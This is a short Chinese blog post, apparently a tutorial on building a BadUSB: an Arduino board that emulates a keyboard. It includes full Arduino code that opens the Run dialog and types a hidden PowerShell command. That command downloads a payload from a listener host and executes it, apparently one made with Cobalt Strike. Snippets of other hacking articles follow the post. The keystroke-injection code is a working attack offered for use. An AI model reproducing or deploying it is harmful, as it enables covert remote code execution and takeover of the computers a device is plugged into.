一次失败的badusb制作

VSole2021-07-17 19:25:03

最近有个大佬问了我关于badusb的事情。所有想出一期badusb的教程(其实本来已经写好了一半了的,但是中途我设备坏了。重启电脑导致没保存)QAQ



本来想出一期不一样的badusb(自己设计的payload),但无奈我的badusb坏了。验证不了我自己的payload。所有........求各位轻点喷。


其实我们所说的badusb就是利用usb协议的漏洞去模拟键盘,它只是arduino的开发板。



首先我们打开cs设置监听并生成powershell的payload

然后我们打开arduino把代码和payload烧进去

这里有几点需要注意:

1)在烧录前需要关闭虚拟机,因为烧录过程会反复识别设备,虚拟机的设备扫描会阻塞烧录进行导致失败。

2)在烧录前选好对应的开发板型号和端口。

3)

以下是具体代码:

void setup() {

Keyboard.begin();//启动键盘模拟

delay(5000);//延迟5000毫秒

Keyboard.press(KEY_LEFT_GUI);//按下win键

delay(500);

Keyboard.press('r');//按下r键

delay(500);

Keyboard.release('r'); //放开r键

Keyboard.release(KEY_LEFT_GUI);

Keyboard.press(KEY_CAPS_LOCK);//打开大写锁定,防止中文输入法

Keyboard.release(KEY_CAPS_LOCK);

delay(500);

Keyboard.println("POWERSHELL");//打开powershell

delay(500);

Keyboard.releaseAll();//放开所有按键

Keyboard.println("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.104:80/a'))\"");//导入payload并运行

delay(3000);

}

电脑payload
本作品采用《CC 协议》,转载必须注明作者和本文链接
1.漏洞背景在群里闲聊时,看到颜夏大佬在打诈骗站,由于是虚拟机主机就直接删站挂黑页了(装装逼嘛)接下来轮到我了,首先信息收集一波找到了旁站,随便打开一个弱口令进入后台找到上传点:上传shell上传失败尝试使用图片马,改成php试试这就很神奇了估计判断了文件头好家伙报错后台找到一个文件管理器,权限还蛮大的~这里可以直接创建webshell文件那我直接找找之前上传的马子先尝试编辑好家伙直接空的填写一下
King-Hacking介绍以前我们都是把看到合适的,喜欢的全部下载在电脑上,但慢慢的发现,99%的安全工具下载后都是闲置的,常用的就那么几款,今天发现这个小脚本,它列出了一些常用的分类并收集了常用的渗透测试工具列表,你喜欢哪个进去选择就行,然后它会自动给你下载回来。需要注意的是,它默认下载位置是用户名下,而不是当前目录下。
一次失败的badusb制作
2021-07-17 19:25:03
最近有个大佬问了我关于badusb的事情。重启电脑导致没保存)QAQ本来想出一期不一样的badusb,但无奈我的badusb坏了。
整个过程仅讲思路的实现,因笔者日常工作并不相关,从构思到实现,前前后后大概花了两个月时间,未对数据进行整理,也未列出具体的步骤,仅供研究与参考,思路如有雷同,那真是太好了
论0day抓取的姿势
2022-07-07 22:17:50
提供该漏洞细节或者利用程序的人通常是该漏洞的发现者。一般攻击路径都是通过互联网进行,那么我们利用属于DMZ区的一台服务器上搭建一个docker漏洞环境,然后通过falco进行CONTAINER内执行命令的监控,在互联网侧通过packetbeat进行HTTP的payload的的捕获。
分享一个略水但挺有意思的漏洞挖掘过程:ESP8266 wifi killer固件zhangguanzhang汉化版web ui界面wifi名字存在xss注入
在一些开启了 Hyper-V 的电脑上,RouterOS 可能无法在 VMWare Workstation 中模拟运行或启动非常缓慢,如果遇到无法运行的情况,请酌情考虑关闭 Hyper-V,如果能成功运行但是启动缓慢,可以及时拍摄快照。
并且在确认时可以看到交易细节,因此不会贸然确认向其他人转账的信息。常规登录程序接管。该浏览器扩展使用本机消息将请求从网站转发到应用程序,并将响应发送回网页。当此类事件发生时,应用程序将指示扩展调用页面上已注册的回调函数。此漏洞允许将tabid的任何值注入到响应中。总之,所有韩国银行网站似乎都严重依赖jQuery,这及易产生攻击。因此,这种攻击允许恶意网站破坏任何依赖TouchEn扩展的网站。韩国银行强制用户安
VSole
网络安全专家